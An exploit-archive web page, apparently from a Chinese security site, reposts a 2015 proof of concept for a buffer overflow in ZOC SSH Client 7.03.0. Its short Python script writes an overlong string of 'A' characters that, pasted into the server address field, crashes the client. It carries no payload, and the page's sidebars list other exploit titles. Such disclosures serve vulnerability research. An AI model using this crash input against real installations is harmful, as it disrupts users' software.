首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
ZOC SSH Client Buffer Overflow Vulnerability (SEH)
来源:vfocus.net 作者:Farhi 发布时间:2015-05-22  
"""
# Exploit title: ZOC SSH Client v.7.03.0 Buffer overflow vulnerability (SEH)
# Date: 20-5-2015
# Vendor homepage: www.emtec.com
# Software Link: http://www.emtec.com/cgi-local/download.cgi?what=ZOC7%20(Windows)&link=zoc/zoc7030.exe&ext=html
# Author: Dolev Farhi
   
# Details:
# --------
# Create a new connection, run the py script and copy the AAAA...string from zoc.txt to clipboard. paste it in the
# server address and attempt to connect.
"""
   
#!/usr/bin/python
filename="zoc.txt"
buffer = "\x41" * 97
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·OpenLitespeed 1.3.9 - Use Afte
·Fuse - Local Privilege Escalat
·QEMU - Floppy Disk Controller
·Lenovo System Update Privilege
·Phoenix Contact ILC 150 ETH PL
·Samba 3.0.37 EnumPrinters 堆内
·Windows - CNG.SYS Kernel Secur
·FTP Media Server 3.0 - Authent
·Microsoft Windows - Local Priv
·Apache Jackrabbit WebDAV XXE E
·ElasticSearch 1.4.5 / 1.5.2 -
·ESC 8832 Data Controller Multi
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved